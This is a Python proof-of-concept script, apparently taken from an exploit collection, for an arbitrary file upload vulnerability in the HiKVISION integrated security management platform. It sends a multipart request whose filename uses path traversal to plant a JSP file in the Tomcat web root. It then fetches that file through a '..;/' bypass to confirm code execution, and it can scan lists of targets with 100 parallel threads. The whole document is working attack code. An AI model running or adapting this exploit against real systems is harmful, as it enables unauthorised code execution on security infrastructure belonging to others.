#HiKVISION综合安防管理平台report任意文件上传漏洞

import requests,sys,argparse,re,json
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
     test=""" """
     print(test)

def main():
    banner()
    parsers=argparse.ArgumentParser(description='HiKVISION综合安防管理平台report任意文件上传漏洞')
    parsers.add_argument('-u','--url',dest='url',type=str,help='please input your url')
    parsers.add_argument('-f','--file',dest='file',type=str,help='please input your filepath')
    args=parsers.parse_args()

    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list=[]
        with open(args.file,'r',encoding='utf-8') as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp=Pool(100)
        #mp.map(poc, url_list) 的作用是并行地对 url_list 中的每个 URL 执行 poc 函数（或方法）
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"usag:\n\t python {sys.argv[0]} -h")
def poc(target):
    payload='/artemis-portal/artemis/env'
    headers={
        'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36',
        'Content-Type':'multipart/form-data',
    }
   
    data='''
         ------WebKitFormBoundarykcerblvm
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/mctc.jsp"
Content-Type: application/zip

<%out.print(43000 * 42955);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>

------WebKitFormBoundarykcerblvm--
'''
    payload1='/portal/ui/login/..;/..;/mctc.jsp'
    try:
        res1=requests.post(url=target+payload,headers=headers,verify=False,data=data)
        res2=requests.get(url=target+payload1,verify=False)
        res3=json.loads(res1.text)

        if res1.status_code==200 and res3['msg']=='上报的文件格式错误':
                if res2.status_code==200 and '1847065000' in res2.text:    
                    print(f"[+]目标存在 {target}")
                    with open('result.txt','a') as f:
                        f.write(target+'\n')
        else:
             print(f'[-]目标不存在漏洞 {target}')
    except:
        pass


if __name__ == '__main__':
    main()


